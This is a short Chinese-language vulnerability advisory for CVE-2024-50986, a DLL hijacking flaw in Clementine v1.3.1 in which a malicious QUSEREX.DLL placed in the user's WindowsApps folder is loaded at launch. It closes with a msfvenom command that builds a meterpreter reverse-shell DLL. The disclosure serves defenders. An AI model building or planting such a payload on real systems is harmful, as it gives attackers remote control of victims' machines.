描述: Clementine v.1.3.1 中的一个问题允许本地攻击者通过精心构造的 DLL 文件执行任意代码。
受影响版本: Clementine v.1.3.1
研究人员: Utkarsh (r1971d3) LinkedIn
NIST CVE 链接: https://nvd.nist.gov/vuln/detail/CVE-2024-50986
漏洞类型: 不受信任的搜索路径
受影响组件: QUSEREX.DLL
为了利用此漏洞,攻击者需要构造一个名为 QUSEREX.DLL 的恶意 DLL,并将其放置在目录:C:\Users<用户名>\AppData\Local\Microsoft\WindowsApps\ 中。当 Clementine 应用程序启动时,它将加载该恶意 DLL,从而执行攻击者的代码。


sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL



